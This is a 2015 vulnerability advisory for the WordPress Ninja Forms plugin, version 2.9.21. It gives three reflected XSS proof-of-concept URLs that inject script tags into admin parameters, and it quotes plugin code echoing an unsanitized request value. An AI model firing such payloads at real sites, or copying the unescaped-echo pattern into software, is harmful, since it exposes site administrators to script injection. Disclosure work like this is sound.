WordPress Ninja Forms 2.9.21 Cross Site Scripting

`Title: WordPress 'Ninja Forms' Plugin - XSS  
Version: 2.9.21  
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej  
Date: 2015/07/14  
Download: https://wordpress.org/plugins/ninja-forms/  
Contacted authors: 2015/07/14  
==========================================================  
  
## Description:   
==========================================================  
Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site.  
  
## Reflected XSS:  
==========================================================  
Certain parameters are used unsanitized in the admin pages.   
  
PoC:  
Log in as admin and visit one of the following URLs:  
  
  
[URL]/wp-admin/admin.php?page=nf-processing&title=<script>alert(123);</script>  
[URL]/wp-admin/admin.php?page=nf-processing&action=</script><script>alert(123);</script>  
[URL]/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id="><script>alert(132);</script>&notification-action=new  
  
It looks like there are more vulnerabilities, since the plugin has code like this:  
  
file: subs-cpt.php  
...  
l.883 if ( isset ( $_REQUEST['ref'] ) ) {  
l.884 $ref = $_REQUEST['ref'];  
l.885 } else if ( get_transient( 'nf_sub_edit_ref' ) ) {  
l.886 $ref = get_transient( 'nf_sub_edit_ref' );  
l.887 } else {  
l.888 $ref = '';  
l.889 }  
l.890 ?>  
l.891 <input type="hidden" name="ref" value="<?php echo $ref; ?>" />  
...  
  
  
## Solution  
==========================================================  
No fix available.   
`